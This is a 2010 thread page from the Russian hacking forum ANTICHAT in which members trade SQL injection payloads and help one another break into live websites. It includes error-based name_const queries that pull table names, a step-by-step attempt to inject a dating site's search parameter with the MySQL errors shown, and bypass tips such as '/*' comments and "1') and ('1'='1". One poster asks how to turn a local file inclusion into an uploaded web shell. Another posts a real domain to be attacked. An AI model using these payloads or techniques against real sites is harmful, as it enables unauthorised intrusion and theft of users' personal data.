HOME    FORUMS    MEMBERS    RECENT POSTS    LOG IN  
Баннер 1   Баннер 2

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
Вернуться   Форум АНТИЧАТ > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #15371  
Старый 16.10.2010, 11:37
R1dex
Участник форума
Регистрация: 17.09.2008
Сообщений: 211
Провел на форуме:
1571865

Репутация: 571
Отправить сообщение для R1dex с помощью ICQ
По умолчанию

site.com/2.php?id=6+or(1,2)=(select*from(select name_const((select table_name from information_schema.tables limit 17,1),1),name_const((select table_name from information_schema.tables limit 17,1),1))a)

or

site.com/2.php?id=6 union select * from(select * from(select name_const((select table_name from information_schema.tables limit 17,1), 11)d) as t join (select name_const((select table_name from information_schema.tables limit 17,1), 11)e) b)a
 
Ответить с цитированием

  #15372  
Старый 17.10.2010, 17:45
jecka3000
Постоянный
Регистрация: 15.03.2008
Сообщений: 441
Провел на форуме:
2052341

Репутация: 95
По умолчанию

Имеется локальный инклуд. С нул байтом. Цель - залить шелл.

На портале нет ни форума, ни блога - там где можна залить какую либо картинку и потом ее приинклудить. Нужна помощь... подкиньте идейку, как заинклудить шелл)
 
Ответить с цитированием

  #15373  
Старый 17.10.2010, 19:43
ILYAtirtir
Участник форума
Регистрация: 25.04.2007
Сообщений: 176
Провел на форуме:
1957988

Репутация: 739
Отправить сообщение для ILYAtirtir с помощью ICQ
По умолчанию

http://www.xakep.ru/post/49508/default.asp
 
Ответить с цитированием

  #15374  
Старый 17.10.2010, 19:56
YuNi|[c
Участник форума
Регистрация: 17.09.2006
Сообщений: 248
Провел на форуме:
556476

Репутация: 66
По умолчанию

уже два дня мучаюсь ((, тут как поступит?

Привожу варианты:

http://site.net/script.php?seeking_sex=1'

1064 - You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '2' OR user_master.seeking_sexuality like '%,2' OR user_mas' at line 13

Цитата:
Сообщение от None  
SELECT distinct user_master.user_master_id, user_master.user_nickname, user_master.user_image, user_master.protected_image, user_master.explicit_image, user_master.r_rated_image, user_master.mark_as_logout, user_master.user_postcode, user_master.user_state, user_master.user_city, user_master.user_profile_title, user_master.user_description, user_master.seeking_description, user_master.user_maritial_status, user_master.profile_avg_rate, user_master.profile_rate_voter, user_master.seeking_sexuality, user_master.user_registered_as, user_master.email_verified, user_master_detail.user_profession, user_master.last_login, DATE_FORMAT(FROM_DAYS(TO_DAYS(NOW()) - TO_DAYS(user_master_detail.user_dob)), '%y') AS age FROM user_master INNER JOIN user_master_detail on(user_master_detail.user_master_id = user_master.user_master_id) WHERE user_master.user_show_profile_in_search='Y' and is_deleted_user_profile = 'N' AND user_master.user_master_id<>'0' AND user_master.is_new='N' AND (which_site_user = '2' OR which_site_user = '11') AND ( user_master.user_registered_as = '1'' ) AND (user_master.seeking_sexuality like '2' OR user_master.seeking_sexuality like '%,2' OR user_master.seeking_sexuality like '2,%' OR user_master.seeking_sexuality like '%,2,%' ) AND user_master.user_state='12' AND ( (DATE_FORMAT(FROM_DAYS(TO_DAYS(NOW()) - TO_DAYS(user_master_detail.user_dob)), '%y') BETWEEN 18 AND 100)) GROUP BY user_master.user_master_id order by user_master.last_login desc, user_master.created_date desc LIMIT 0, 6
http://site.net/script.php?seeking_sex=1')

1064 - You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '' ) AND (user_master.seeking_sexuality like '2' OR user_master.seekin' at line 13

http://site.net/script.php?seeking_sex=1' order by 1--

1064 - You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'order b' ) AND (user_master.seeking_sexuality like '2' OR user_master' at line 13

тут одинаков ответ:

http://site.net/script.php?seeking_sex=1') order by 1--

1064 - You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '' ) AND (user_master.seeking_sexuality like '2' OR user_master.seekin' at line 13

http://site.net/script.php?seeking_sex=1') order by 1000--

1064 - You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '' ) AND (user_master.seeking_sexuality like '2' OR user_master.seekin' at line 13

тока на:

http://site.net/script.php?seeking_sex=1'' order by 1--

норм стр

но на:

http://site.net/script.php?seeking_sex=1'' order by 1000--

ответ тоже норм стр ((

Как можно решит тут? floor не помог

Заранее благодарен

PS. линк не палил
 
Ответить с цитированием

  #15375  
Старый 17.10.2010, 22:18
Strilo4ka
Reservists Of Antichat - Level 6
Регистрация: 05.04.2009
Сообщений: 231
Провел на форуме:
3363660

Репутация: 1148
По умолчанию

Многострочный запроc, а вы режете --, используйте /*.

Если не прокатит /*, то в уязвимый параметр 1') and ('1'='1.

Ну и тудо же впихнуть разные вариции всего известного чтоб вытащить в ошибку | пытатцо сделать принтабельной.
 
Ответить с цитированием

  #15376  
Старый 18.10.2010, 00:23
YuNi|[c
Участник форума
Регистрация: 17.09.2006
Сообщений: 248
Провел на форуме:
556476

Репутация: 66
По умолчанию

Цитата:
Сообщение от Strilo4ka  
Strilo4ka said:
Многострочный запроc, а вы режете
--
, используйте
/*
.
Если не прокатит
/*
, то в уязвимый параметр
1') and ('1'='1
.
Ну и тудо же впихнуть разные вариции всего известного чтоб вытащить в ошибку | пытатцо сделать принтабельной.
спс

пробовал так:

http://site.net/script.php?seeking_sex=1') and ('1'='1+order by 1/*

без ошибок но и без профилей

а так:

http://site.net/script.php?seeking_sex=-1') and ('1'='1+order by 1/*

1064 - You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '2' OR user_master.seeking_sexuality like '%,2' OR user_mas' at line 13

http://site.net/script.php?seeking_sex=-1') OR ('1'='1+order by 1/*

без ошибок но и без профилей

что то не получится чтол
 
Ответить с цитированием

  #15377  
Старый 18.10.2010, 01:01
Konqi
Постоянный
Регистрация: 24.06.2009
Сообщений: 542
Провел на форуме:
2101094

Репутация: 672


Отправить сообщение для Konqi с помощью ICQ
По умолчанию

YuNi|[c гадать трудно, думаю линк помог бы быстрее решить проблему
 
Ответить с цитированием

  #15378  
Старый 18.10.2010, 02:46
YuNi|[c
Участник форума
Регистрация: 17.09.2006
Сообщений: 248
Провел на форуме:
556476

Репутация: 66
По умолчанию

Цитата:
Сообщение от Konqi  
Konqi said:
YuNi|[c гадать трудно, думаю линк помог бы быстрее решить проблему
ну линк в студию просто убет его ))

Отправил в пм
 
Ответить с цитированием

  #15379  
Старый 18.10.2010, 20:09
B1t.exe
Постоянный
Регистрация: 06.11.2006
Сообщений: 865
Провел на форуме:
1977708

Репутация: 208


По умолчанию

В одном сайте при бронирование номера вылез такое дело:

Цитата:
Сообщение от None  
Символьные или двоичные данные могут быть усечены.~|~exec renesans.dbo.BronJPrepareSitePublic @UIDTD=62503, @UIDTDError=58600, @UIDSiteGenerate=2808866;
Это уязвимость ? (и вообше что это такое? )
 
Ответить с цитированием

  #15380  
Старый 18.10.2010, 20:32
hakrat
Guest
Сообщений: n/a
Провел на форуме:
2060

Репутация: 0
По умолчанию

А такое как раскрутить

http://steroidman.ru/dle_haki/page/999999999999999999
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Ваши ламерские приколы (Ну когда только комп появился) PEPSICOLA Болталка 188 23.05.2010 10:05
Ваши любимые компьютерные игры PEPSICOLA Болталка 280 19.08.2009 00:01
Ваши телеги... F-IFTY Болталка 13 18.08.2009 18:22
Вопросы по Ipb 2.0 Voodoo_People Уязвимости CMS / форумов 26 15.02.2005 22:57



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ